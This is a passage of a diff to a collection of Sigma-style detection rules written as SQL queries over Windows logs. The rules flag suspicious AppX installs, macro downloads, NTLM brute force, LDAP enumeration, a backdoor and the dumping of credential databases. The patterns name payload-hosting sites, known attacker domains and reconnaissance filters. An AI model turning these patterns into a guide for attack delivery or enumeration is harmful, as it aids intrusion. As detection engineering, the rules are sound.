EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Deployment Of The AppX Package Was Blocked By The Policy", - "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "title": "Office Macro File Download", + "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by the local computer policy", - "author": "frack113", + "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Legitimate macro files downloaded from the internet", + "Legitimate macro files sent as attachments via emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_policy_block.yml" + "filename": "file_event_win_office_macro_files_downloaded.yml" }, { - "title": "Suspicious AppX Package Installation Attempt", - "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", + "title": "Publisher Attachment File Dropped In Suspicious Location", + "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "status": "experimental", - "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Legitimate AppX packages not signed by MS used part of an enterprise" + "Legitimate usage of \".pub\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" ], - "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" + "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" }, { - "title": "Deployment AppX Package Was Blocked By AppLocker", - "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", + "title": "Suspicious Screensaver Binary File Creation", + "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by AppLocker policy", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" - ], - "filename": "win_appxdeployment_server_applocker_block.yml" - }, - { - "title": "Potential Malicious AppX Package Installation Attempts", - "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", - "status": "experimental", - "description": "Detects potential installation or installation attempts of known malicious appx packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_mal_appx_names.yml" + "filename": "file_event_win_creation_scr_binary_file.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" - ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" - }, - { - "title": "Uncommon AppX Package Locations", - "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_uncommon_package_locations.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "WMI Persistence", - "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" - ], - "falsepositives": [ - "Unknown (data set is too small; further testing needed)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" - ], - "filename": "win_wmi_persistence.yml" - }, - { - "title": "Sysinternals Tools AppX Versions Execution", - "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", - "status": "experimental", - "description": "Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "falsepositives": [ - "Legitimate usage of the applications from the Windows Store" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" - ], - "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" - }, - { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", - "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", - "id": "31d68132-4038-47c7-8f8e-635a39a7c174", - "status": "test", - "description": "Detects potential Active Directory enumeration via LDAP", - "author": "Adeem Mawani", - "tags": [ - "attack.discovery", - "attack.t1069.002", - "attack.t1087.002", - "attack.t1482" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" - ], - "filename": "win_ldap_recon.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" - ], - "filename": "win_codeintegrity_revoked_driver.yml" - }, - { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", - "tags": [ - "attack.execution" + "attack.t1574.001" ], "falsepositives": [ - "Antivirus products" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" - ], - "filename": "win_codeintegrity_blocked_driver_load.yml" - }, - { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", - "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", - "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "Potential Remote Desktop Connection to Non-Domain Host", - "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", - "author": "James Pemberton", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "falsepositives": [ - "Host connections to valid domains, exclude these.", - "Host connections not using host FQDN.", - "Host connections to external legitimate domains." - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" - ], - "filename": "win_susp_ntlm_rdp.yml" - }, - { - "title": "NTLM Logon", - "id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", - "status": "experimental", - "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1550.002" - ], - "falsepositives": [ - "Legacy hosts" - ], - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8002' AND ProcessName LIKE '%' ESCAPE '\\')" - ], - "filename": "win_susp_ntlm_auth.yml" - }, - { - "title": "NTLM Brute Force", - "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", - "status": "test", - "description": "Detects common NTLM brute force device names", - "author": "Jerry Shockley '@jsh0x'", "tags": [ "attack.credential_access", - "attack.t1110" - ], - "falsepositives": [ - "Systems with names equal to the spoofed ones used by the brute force tools" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" - ], - "filename": "win_susp_ntlm_brute_force.yml" - }, - { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": 